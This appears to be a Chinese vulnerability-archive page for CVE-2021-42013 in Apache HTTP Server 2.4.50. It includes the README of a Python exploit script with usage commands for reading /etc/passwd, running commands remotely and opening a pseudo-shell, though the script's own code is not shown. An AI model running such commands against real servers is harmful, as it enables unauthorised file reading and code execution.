关联漏洞
标题:Apache HTTP Server 安全漏洞 (CVE-2021-42013)Description:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
Description
CVE-2021-42013 - Apache 2.4.50
介绍
# Apache HTTP Server 2.4.50 LFI & RCE
A python3 script for the CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI & RCE. RCE requires cgi-bin to be enabled
## Getting Started
### Executing program
* LFI
```
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
```
* RCE
```
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
```
* Pseudo-shell
```
python3 apache_2.4.50.py -t http://apache.hack/ -shell
```
## Help
For help menu:
```
python3 apache_2.4.50.py -h
```
## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
文件快照
[4.0K] /data/pocs/0fdac0d03200b4f55632e131800a0b7e9371aff1
├── [2.2K] apache_2.4.50.py
└── [ 979] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →